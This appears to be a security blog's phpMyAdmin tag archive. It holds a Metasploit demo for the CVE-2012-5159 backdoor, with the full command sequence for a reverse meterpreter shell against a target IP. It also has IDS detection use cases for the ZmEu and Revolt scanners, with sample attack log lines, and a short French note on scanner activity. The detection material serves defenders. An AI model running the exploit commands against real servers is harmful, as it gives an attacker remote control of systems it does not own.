Tag Archives: phpMyAdmin

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Exploits, Metasploit

Timeline :

Backdoor discovered by Passerby the 2012-09-25
Backdoor presence vendor notification the 2012-09-25
Metasploit PoC provided the 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

SUC025 : ZmEu exploit scanner

Opportunists, Use Cases, , ,
  • Use Case Reference : SUC025
  • Use Case Title : ZmEu exploit scanner
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : ZmEu bot
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • phpMyAdmin scanner

Source(s) :

Emerging Threats SIG 2010715 triggers are :

  • The HTTP header should contain “Made by ZmEu” User-Agent string. Example : “User-Agent: Made by ZmEu @ WhiteHat Team – www.whitehat.ro
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
SIG 2010715 1 Week events activity
SIG 2010715 1 Week events activity
SIG 2010715 1 month events activity
SIG 2010715 1 month events activity
1 Month TOP 10 source IPs for SIG 2010715
1 Month TOP 10 source IPs for SIG 2010715

SUC004 : phpMyAdmin User-Agent Revolt Scanner

Opportunists, Use Cases, , , , ,
  • Use Case Reference : SUC004
  • Use Case Title : phpMyAdmin User-Agent Revolt Scanner
  • Use Case Detection : HTTP Logs / IDS
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Revolt Scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random port, but static source port when scan is initiated
  • Destination Port(s) : 80/TCP, 443/TCP
Possible(s) correlation(s) :
  • phpMyAdmin scanner

Source(s) :

Surely during your daily HTTP log check, you have detect theses kind of patterns.

...
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/sqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/mysqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin2/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/2phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmy/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phppma/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/myadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/MyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/program/ HTTP/1.1" 301 - "-" "revolt"
...

Theses patterns are related to Revolt Scanner, an Web scanner specialized in phpMyAdmin installation discovery. When the scanner is started the source port will stay static during the complete web directory discovery brute forcing. Also, this scanner is only targeting the IN A IP address of the domain he is asking.

Theses scans are detected by Emerging Threats Snort rules, more precisely the 2009288WEB_SERVER Attack Tool Revolt Scanner“.

You can find here, the typical list of directories how are scanned by revolt.

Here under you can find the latest statistics for Revolt Agent activities.

1 Month SIG 2009288 events activities
1 Month SIG 2009288 events activities
One year SIG 2009288 events activities
One year SIG 2009288 events activities
1 Month TOP 10 source IPs for SIG 2009288
1 Month TOP 10 source IPs for SIG 2009288
TOP 20 source countries for SIG 2009288
TOP 20 source countries for SIG 2009288

Activité croissante de Revolt Scanner

Various, ,

Depuis environ 1 mois, l’on peut observer une activité croissante du scanner Revolt, spécialisé dans la découverte des installations de phpMyAdmin. L’année dernière cette même croissance d’activité avait précéder la mise sur Internet d’un exploit pour phpMyAdmin, qui d’ailleurs est aussi activement utilisé comme vecteur d’attaque. Une nouvelle vulnérabilité non encore publiée pour phpMyAdmin serait-elle en cours d’exploitation ?